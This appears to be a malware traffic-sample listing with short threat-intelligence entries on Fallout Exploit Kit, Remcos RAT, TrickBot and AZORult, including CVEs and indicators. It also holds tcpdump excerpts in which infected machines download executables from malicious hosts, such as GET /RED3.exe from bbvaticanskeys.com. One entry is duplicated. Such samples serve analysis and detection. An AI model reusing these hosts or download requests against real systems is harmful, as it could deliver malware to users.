Fallout Exploit Kit Raccoon Stealer CVE-2018-4878 CVE-2018-15982 CVE-2018-8174 Raccoon Stealer Malware PCAP Download Traffic Sample

Fallout Exploit Kit is back and targeting the following CVE’s as of 4-8-2020: Vulnerabilities CVE-2018-4878 CVE-2018-15982 CVE-2018-8174 Fallout has been observed in the wild delivering the following malware payloads: Ransomware Stop – Ransomware GandCrab 5 – Ransomware Kraken Cryptor – Ransomware GandCrab – Ransomware Maze – Ransomware Fake Globe – Ransomware Minotaur – Ransomware Matrix – Ransomware Sodinokibi – Ransomware Raccoon Stealer – This sample (also known as Legion, Mohazo, and Racealer) is high-risk trojan-type application that stealthily infiltrates the system and collects personal information. Having this trojan installed on your computer might lead to various issues. 2020-02-24 19:34:02.651895 IP […]

Remcos RAT Trojan Malware PCAP file download Traffic Sample

Remcos is a RAT type malware which means that attackers use it to perform actions on infected machines remotely. This malware is extremely actively caped up to date with updates coming out almost every single month.  TypeTrojan  Originex-USSR territory  First seen1 June, 2016  Last seen9 February, 2020 2020-02-08 21:12:20.981585 IP 192.168.86.25.56271 > 46.4.22.188.80: Flags [P.], seq 2260857165:2260857557, ack 24046668, win 16425, length 392: HTTP: GET /a/a.exe HTTP/1.1 E…..@…….V……..P…M.n.LP.@)*…GET /a/a.exe HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: […]

RED3.exe bhvaticanskeys.com 181.129.104.139.449 Trickbot Malware Banking Trojan

JA3 Fingerprint: f735bbc6b69723b9df7b0e7ef27872af First seen: 2018-10-02 18:04:16 UTC Last seen: 2020-01-15 05:53:57 UTC Status: Blacklisted Malware samples: 1’816 Destination IPs: 193 Malware: TrickBot Listing date: 2020-01-09 14:17:18 2020-01-16 06:18:01.857421 IP 192.168.86.25.56294 > 94.23.64.40.80: Flags [P.], seq 1:444, ack 1, win 64240, length 443: HTTP: GET /RED3.exe HTTP/1.1 E…..@…;…V.^.@(…P-C.>.ca.P…ch..GET /RED3.exe HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, / Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: bbvaticanskeys.com Connection: Keep-Alive Cookie: SERVERID104280=112034|XiBGX|XiBGX 2020-01-16 06:18:01.968837 IP 94.23.64.40.80 > 192.168.86.25.56294: Flags [.], seq 1:1461, ack 444, […]

RED3.exe bhvaticanskeys.com 181.129.104.139.449 Trickbot Malware Banking Trojan PCAP download traffic sample

JA3 Fingerprint: f735bbc6b69723b9df7b0e7ef27872af First seen: 2018-10-02 18:04:16 UTC Last seen: 2020-01-15 05:53:57 UTC Status: Blacklisted Malware samples: 1’816 Destination IPs: 193 Malware: TrickBot Listing date: 2020-01-09 14:17:18 2020-01-16 06:18:01.857421 IP 192.168.86.25.56294 > 94.23.64.40.80: Flags [P.], seq 1:444, ack 1, win 64240, length 443: HTTP: GET /RED3.exe HTTP/1.1 E…..@…;…V.^.@(…P-C.>.ca.P…ch..GET /RED3.exe HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, / Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: bbvaticanskeys.com Connection: Keep-Alive Cookie: SERVERID104280=112034|XiBGX|XiBGX 2020-01-16 06:18:01.968837 IP 94.23.64.40.80 > 192.168.86.25.56294: Flags [.], seq 1:1461, ack 444, […]

AZORult Rultazo PuffStealer Cryptocurrency Malware Crimeware PCAP file download Traffic Sample

AZORult can steal banking information including passwords and credit card details as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. Type Stealer Origin ex-USSR First seen 1 January, 2016 Last seen 16 January, 2020 Also known as PuffStealer Rultazo The Trojan-PSW.Win32.Azorult is considered dangerous by lots of security experts. GridinSoft Anti-Malware THANK YOU!DOWNLOAD NOW On Going Offer What Trojan-PSW.Win32.Azorult virus can do? Executable code extraction Creates RWX memory HTTP traffic contains suspicious features which may be indicative of malware related traffic Performs some HTTP requests Unconventionial […]